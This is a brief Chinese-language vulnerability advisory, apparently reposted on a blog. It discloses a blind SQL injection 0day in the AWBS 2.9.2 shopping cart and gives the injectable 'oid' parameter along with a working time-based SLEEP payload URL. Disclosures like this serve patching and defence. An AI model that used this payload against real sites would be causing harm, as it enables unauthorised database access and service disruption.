AWBS 2.9.2 Blind SQL 注入0day

发布日期:2011-01.22
发布作者:ShivX

影响版本:AWBS 2.9.2
官方网站:http://www.awbs.com

漏洞类型:SQL注入
漏洞描述:



---Vulnerability---



http(s)://[HOST]/cart?ca=add_other&oid=[TRUE VALUE]'[BLIND-SQL]

=============================================================================================

---PoC Using Time-Based Blind SQL Injection---



https://www.vulnerablehost.com/cart?ca=add_other&oid=1'%20AND%20SLEEP(100)='

本文由站长原创或收集,不代表本站立场,如若转载,请注明出处:https://www.yesck.com/post/426/

本文 暂无 评论

回复给

欢迎点评

联系我们

站长QQ:8117829

站长邮件:8117829@qq.com

工作时间:周一至周五,9:30-18:30,节假日休息

QR code